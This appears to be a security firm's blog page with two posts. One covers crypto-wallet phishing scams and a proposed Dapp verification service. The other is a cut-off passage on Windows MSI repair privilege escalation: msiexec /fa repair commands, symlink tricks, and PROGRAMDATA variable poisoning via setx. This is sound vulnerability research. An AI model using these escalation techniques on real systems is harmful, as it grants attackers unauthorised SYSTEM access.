ABOUT US

We are security engineers who break bits and tell stories.

© 2026 Doyensec LLC

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.



Let’s take a look at the common NFT approve scam. The user is led to the malicious NFT site, which advertises a limited pre-mint of a new NFT collection. The user is then prompted to connect their wallet and sign a transaction confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, believing the issue will cause them to miss out on the mint. Their concentration and focus shift from paying attention to the transactions to the fear of missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of calling the mint function, calls setApprovalForAll, which essentially gives the malicious actor control over the user’s tokens. By this point, the user is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These types of attacks are very common today. A user stumbles on a link to a project offering new opportunities for profit, connects their wallet, and mistakenly hands over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

Nobody can deny that the introduction of blockchain-based technologies and Web3 has had a massive impact on the world. A lot of them have offered the following common set of features:

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

| Technology | Communication Protocol | User-Agent |
|---|---|---|
| Web2 | HTTP/TLS | Web Browser |
| Web3 | Blockchain JSON RPC | Crypto Wallet |

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, let’s see what a typical crypto wallet interaction for a normal user might look like.

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:



In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.



A few of the protections implemented by crypto wallets include requiring authorization before being able to access the user’s accounts and requests for transactions to be signed. This was not the case before EIP-1102. However, implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

If all the previous steps were completed successfully, the user can start using the Dapp.



When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.
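To make this flow more concrete, the requests a Dapp hands to the wallet could look roughly like the sketch below. The method names `eth_requestAccounts` (introduced by EIP-1102) and `eth_sendTransaction` are standard Ethereum provider methods; the helper function names and the addresses are placeholders chosen only for illustration.

```python
import json


def connect_request(request_id=1):
    """JSON-RPC request asking the wallet to expose the user's accounts (EIP-1102)."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_requestAccounts",
        "params": [],
    }


def send_transaction_request(sender, to, data, value_wei=0, request_id=2):
    """JSON-RPC request asking the wallet to sign and publish a transaction.

    The Dapp generates every field here; the wallet only sees the result.
    """
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_sendTransaction",
        "params": [{
            "from": sender,
            "to": to,
            "value": hex(value_wei),  # amount of native token, hex-encoded
            "data": data,             # ABI-encoded function call, if any
        }],
    }


if __name__ == "__main__":
    # Placeholder addresses, not real accounts or contracts.
    user = "0x" + "11" * 20
    contract = "0x" + "22" * 20
    print(json.dumps(connect_request(), indent=2))
    print(json.dumps(send_transaction_request(user, contract, "0x"), indent=2))
```

Everything the user is asked to confirm originates in the `params` object, which is why the wallet is the natural place to inspect and explain it.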

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to Web2 world, and see what a similar interaction looks like.

Like the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say that the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This will enable an encrypted channel between the user’s browser and Gmail’s servers, eliminating the possibility of any eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.



But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Such warnings will be shown when a secure connection could not be established, the certificate of the host is not trusted or if the certificate is expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.

Comparing both previous examples, we can notice a lack of verification and information being displayed in crypto wallets today. This raises the question: what can be done? There exist a number of publicly available indicators for the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let’s quickly go through them.

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

At this point, a reader might say: “How does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.
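The check described above could be sketched as follows. This is an illustration under stated assumptions, not the wallet-info implementation: the `signature` field name, the canonical JSON serialization, and the injected `recover_signer` callable (which would wrap an Ethereum signature-recovery routine from a library of your choice) are all hypothetical.

```python
import json


def signed_payload(dapp_file):
    """Serialize every field except the signature in a stable order.

    Assumption: the signature covers a canonical JSON encoding of the
    remaining fields. A real scheme would have to specify this exactly.
    """
    body = {key: value for key, value in dapp_file.items() if key != "signature"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode("utf-8")


def verify_dapp_file(dapp_file, deployer_address, recover_signer):
    """Return True if the dapp_file was signed by the contract deployer.

    recover_signer(payload, signature) is a hypothetical callable that
    returns the address that produced the signature, or raises ValueError.
    """
    signature = dapp_file.get("signature")
    if not signature:
        return False
    try:
        signer = recover_signer(signed_payload(dapp_file), signature)
    except ValueError:
        return False
    # Addresses are compared case-insensitively (checksummed vs. lowercase).
    return signer.lower() == deployer_address.lower()
```

The deployer address would come from the blockchain itself, so the Dapp cannot choose which key the signature is checked against.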

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name System, or DNS, which translates it (ex. www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.
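As a rough sketch of how the certificate dates could be collected, the snippet below uses only Python’s standard `ssl` module. The function names are our own, and `fetch_certificate` needs network access, so it is left out of the usage example.

```python
import socket
import ssl
from datetime import datetime, timezone


def fetch_certificate(hostname, port=443, timeout=5.0):
    """Connect to the host and return its validated certificate as a dict."""
    context = ssl.create_default_context()  # verifies the chain and hostname
    with socket.create_connection((hostname, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()


def certificate_window(cert):
    """Return (issued_on, expires_on) as UTC datetimes.

    Expects the dict layout produced by SSLSocket.getpeercert().
    """
    issued = ssl.cert_time_to_seconds(cert["notBefore"])
    expires = ssl.cert_time_to_seconds(cert["notAfter"])
    return (
        datetime.fromtimestamp(issued, tz=timezone.utc),
        datetime.fromtimestamp(expires, tz=timezone.utc),
    )


if __name__ == "__main__":
    # Offline example using the date format getpeercert() returns.
    sample = {
        "notBefore": "Feb  6 22:37:19 2023 GMT",
        "notAfter": "May  7 22:37:18 2023 GMT",
    }
    issued_on, expires_on = certificate_window(sample)
    print(issued_on.isoformat(), expires_on.isoformat())
```

A certificate lifetime of roughly 90 days, as in the sample, is normal for automated issuers, which is why a recent issue date alone says little about a site.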

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alarm the user of potential malicious activity.

Trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project, with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggest the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.
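A minimal sketch of this metric is shown below. It assumes a list of transaction records that each carry a `from` field, which is how block explorer APIs commonly report the sender; the output keys mirror the `contract_tx_count` and `contract_unique_tx` fields used later in this post, but the function itself is only an illustration.

```python
def interaction_stats(transactions):
    """Count total and unique-sender interactions with a contract.

    Each transaction is expected to be a dict with a "from" address.
    """
    # Normalize case so checksummed and lowercase forms count as one sender.
    senders = {tx["from"].lower() for tx in transactions if tx.get("from")}
    return {
        "contract_tx_count": len(transactions),
        "contract_unique_tx": len(senders),
    }


if __name__ == "__main__":
    # Placeholder records: three transactions from two distinct senders.
    txs = [{"from": "0xAa"}, {"from": "0xaa"}, {"from": "0xbb"}]
    print(interaction_stats(txs))
```

Counting unique senders rather than raw transactions makes it harder for an attacker to inflate the number by repeatedly calling their own contract from one account.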

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

- /host?url=<url>
- /contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

    {
      "name": "Example Dapp",
      "timestamp": "2000-01-01T00:00:00Z",
      "domain": "app.example.com",
      "tls": true,
      "tls_issued_on": "2022-01-01T00:00:00Z",
      "tls_expires_on": "2022-01-01T00:00:00Z",
      "dns_record_created": "2012-01-01T00:00:00Z",
      "dns_record_updated": "2022-08-14T00:01:31Z",
      "dns_record_expires": "2023-08-13T00:00:00Z",
      "dapp_file": true,
      "valid_signature": true
    }
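From a wallet’s point of view, querying the endpoint could look like the sketch below. The base URL is an assumption (a locally running instance of the service), and the helper names are ours; only the `/host?url=<url>` path comes from the service description above.

```python
import json
from urllib.parse import urlencode
from urllib.request import urlopen

# Assumption: the service is running locally; adjust to your deployment.
SERVICE_BASE = "http://localhost:8080"


def host_query_url(dapp_url, base=SERVICE_BASE):
    """Build the /host request URL, percent-encoding the Dapp URL."""
    return f"{base}/host?{urlencode({'url': dapp_url})}"


def fetch_host_info(dapp_url, base=SERVICE_BASE, timeout=10.0):
    """Query the service and return the decoded JSON response as a dict."""
    with urlopen(host_query_url(dapp_url, base), timeout=timeout) as response:
        return json.load(response)


if __name__ == "__main__":
    # Only prints the URL; fetch_host_info() needs a running service.
    print(host_query_url("https://app.example.com"))
```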



This information can be shown to the user in a dialog UI element, such as:



As a concrete example, let’s take a look at a fake Uniswap site that was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

    {
      "name": null,
      "timestamp": null,
      "domain": "apply-uniswap.com",
      "tls": true,
      "tls_issued_on": "2023-02-06T22:37:19Z",
      "tls_expires_on": "2023-05-07T22:37:18Z",
      "dns_record_created": "2023-02-06T23:31:09Z",
      "dns_record_updated": "2023-02-06T23:31:10Z",
      "dns_record_expires": "2024-02-06T23:31:09Z",
      "dapp_file": false,
      "valid_signature": false
    }

The missing information in the response reflects that the dapp_file was not found on this domain. This information will then be reflected on the UI, informing the user of potential issues with the Dapp:

At this point, the users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore. Though, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain will be communicated to the user.
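One way a wallet might turn such a response into user-facing warnings is sketched below. The 90-day domain age threshold and the warning texts are arbitrary assumptions made for the example; only the response field names come from the service output shown earlier.

```python
from datetime import datetime, timezone


def host_warnings(info, now, min_domain_age_days=90):
    """Translate a /host response into short, human-readable warnings."""
    warnings = []
    if not info.get("tls"):
        warnings.append("The site does not offer a valid TLS connection.")
    if not info.get("dapp_file"):
        warnings.append("No dapp_file was found, so contract ownership is unverified.")
    elif not info.get("valid_signature"):
        warnings.append("The dapp_file signature does not match the contract deployer.")
    created = info.get("dns_record_created")
    if created:
        created_at = datetime.strptime(created, "%Y-%m-%dT%H:%M:%SZ")
        age_days = (now - created_at.replace(tzinfo=timezone.utc)).days
        if age_days < min_domain_age_days:
            warnings.append(f"The domain was registered only {age_days} days ago.")
    return warnings


if __name__ == "__main__":
    # Relevant fields of the fake Uniswap response shown above.
    fake_site = {
        "domain": "apply-uniswap.com",
        "tls": True,
        "dns_record_created": "2023-02-06T23:31:09Z",
        "dapp_file": False,
        "valid_signature": False,
    }
    for line in host_warnings(fake_site, datetime(2023, 2, 20, tzinfo=timezone.utc)):
        print("-", line)
```

Passing `now` explicitly keeps the function deterministic, which also makes it straightforward to re-evaluate a previously authorized Dapp at a later date.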



Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called and the function parameter representing the recipient, for example the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.

Verifying the recipient gives users confidence they are transferring tokens, or allowing access to their tokens for known, legitimate addresses.
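The following sketch shows how a wallet could match transaction data against a small list of well-known function selectors and pull out the address that receives tokens or approval. The four selectors are the standard ones for these ERC-20/ERC-721 functions; the table layout, the function name, and the returned dictionary are assumptions made for illustration.

```python
# Selector (first 4 bytes of calldata) -> (signature, index of recipient argument).
KNOWN_SELECTORS = {
    "095ea7b3": ("approve(address,uint256)", 0),
    "a22cb465": ("setApprovalForAll(address,bool)", 0),
    "a9059cbb": ("transfer(address,uint256)", 0),
    "23b872dd": ("transferFrom(address,address,uint256)", 1),
}


def describe_call(calldata):
    """Identify the called function and the address that gains tokens or access.

    Returns None when the data is too short to contain a selector.
    """
    data = calldata[2:] if calldata.startswith("0x") else calldata
    data = data.lower()
    if len(data) < 8:
        return None
    selector = data[:8]
    entry = KNOWN_SELECTORS.get(selector)
    if entry is None:
        # Unknown function: the wallet should tell the user about it.
        return {"selector": "0x" + selector, "known": False}
    signature, recipient_index = entry
    # ABI arguments are 32-byte words; an address is the last 20 bytes of its word.
    start = 8 + 64 * recipient_index
    word = data[start:start + 64]
    recipient = "0x" + word[24:] if len(word) == 64 else None
    return {
        "selector": "0x" + selector,
        "known": True,
        "signature": signature,
        "recipient": recipient,
    }


if __name__ == "__main__":
    operator = "ab" * 20  # placeholder address
    calldata = "0xa22cb465" + "0" * 24 + operator + "0" * 63 + "1"
    print(describe_call(calldata))
```

The extracted recipient is the address a wallet would then look up before asking the user to confirm.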

An example response for a given address will look something like:

    {
      "is_contract": true,
      "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
      "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
      "contract_deployed_on": "2023-01-01T00:00:00Z",
      "contract_tx_count": 10,
      "contract_unique_tx": 5,
      "valid_signature": true,
      "verified_source": false
    }

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, most of the verification consists of typing in a valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide “address book”-like functionality, which should be utilized to minimize user errors when initiating a transaction.

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented verifications similar to those described in this post. These features should be standard and required for every crypto wallet, and not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide if they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, then jump right there

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is the need for strict control over employee accounts. In particular, in a well-secured Windows environment, the principle of least privilege ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installer directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or query WMI:

    $ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name
    IdentifyingNumber                      Name
    -----------------                      ----
    {B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.
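When scripting this kind of triage, the two naming conventions mentioned above can be checked with a couple of regular expressions. The sketch below reuses the cached-file pattern from the text; the GUID pattern and the helper names are our own additions for illustration.

```python
import re

# Pattern for cached package names, as quoted in the text above.
CACHED_MSI = re.compile(r"^[0-9a-z]{7}\.msi$")

# Assumption: product codes are brace-wrapped GUIDs in the usual 8-4-4-4-12 layout.
PRODUCT_CODE = re.compile(
    r"^\{[0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12}\}$", re.IGNORECASE
)


def cached_packages(filenames):
    """Keep only the names that look like cached MSI copies."""
    return [name for name in filenames if CACHED_MSI.match(name)]


def is_product_code(value):
    """Check whether a string has the shape of an MSI product code."""
    return bool(PRODUCT_CODE.match(value))


if __name__ == "__main__":
    # Hypothetical directory listing.
    print(cached_packages(["1a2b3c4.msi", "setup.msi", "notes.txt"]))
    print(is_product_code("{B460110D-ACBF-34F1-883C-CC985072AF9E}"))
```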

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

The builtin Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page although some additional undocumented switches are also implemented.

The flags worth highlighting are:

- /l*vx to log any additional details and search for interesting events
- /qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

| Parameter | Description |
|---|---|
| /fp | Repairs the package if a file is missing. |
| /fo | Repairs the package if a file is missing, or if an older version is installed. |
| /fe | Repairs the package if file is missing, or if an equal or older version is installed. |
| /fd | Repairs the package if file is missing, or if a different version is installed. |
| /fc | Repairs the package if file is missing, or if checksum does not match the calculated value. |
| /fa | Forces all files to be reinstalled. |
| /fu | Repairs all the required user-specific registry entries. |
| /fm | Repairs all the required computer-specific registry entries. |
| /fs | Repairs all existing shortcuts. |
| /fv | Runs from source and re-caches the local package. |

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless of course the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it’s not hard to find one that will. For these, msiexec will auto-elevate to perform the necessary actions as the SYSTEM user. Interestingly enough, some actions will still be performed using our unprivileged account, making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.



We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child process’s actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth reenabling this to see if certain actions aren’t controlled by editable registry keys.



Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'
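When testing many packages, the repair invocation can be assembled programmatically. The helper below is a small sketch: it only builds the argument list from the flags discussed above (/f with a single repair mode, /qn, and /l*vx with a log file), and its name and parameters are our own.

```python
# Repair mode letters taken from the table of repair options above.
REPAIR_MODES = set("poedcaumsv")


def repair_command(product_code, mode="a", quiet=False, log_path=None):
    """Build an msiexec repair command line as an argument list.

    The list can be passed to subprocess.run() on a Windows machine.
    """
    if mode not in REPAIR_MODES:
        raise ValueError(f"unknown repair mode: {mode!r}")
    command = ["msiexec.exe", "/f" + mode, product_code]
    if quiet:
        command.append("/qn")  # hide UI interactions
    if log_path:
        command += ["/l*vx", log_path]  # verbose log with extra debugging details
    return command


if __name__ == "__main__":
    chrome = "{B460110D-ACBF-34F1-883C-CC985072AF9E}"
    print(" ".join(repair_command(chrome, "a", log_path="repair.log")))
```

Keeping the log flag optional makes it easy to collect a verbose log only for the packages that show interesting behavior in Process Monitor.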

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

| Filename | Version |

|---|---|

| 7z2201-x64.msi | 22.01 |

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

    <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
      <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
    </Directory>
    ...
    <Component Id="Help" Guid="$(var.CompHelp)">
      <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
        <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
      </File>
    </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets the ProgramMenuFolder property to the full path of the Program Menu folder for the current user. If an “All Users” profile exists and the ALLUSERS property is set, then this property is set to the folder in the “All Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the “All Users” profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used. Although C:\ProgramData is writable even by unprivileged users, the C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the “All Users” profile to the arbitrary location which is writable by the user. The setx command can be used for that. It modifies variables associated with the current user but it’s important to emphasize that only the future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.
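To illustrate why the variable matters, the sketch below derives the “All Users” programs directory from a given PROGRAMDATA value and flags values that differ from the usual default. It is a simplified model of the path resolution, not the installer’s actual logic; the function names and the C:\ProgramData default are assumptions for the example.

```python
import ntpath

DEFAULT_PROGRAMDATA = r"C:\ProgramData"  # usual default on Windows


def all_users_programs_dir(programdata):
    """Start Menu programs directory derived from a PROGRAMDATA value."""
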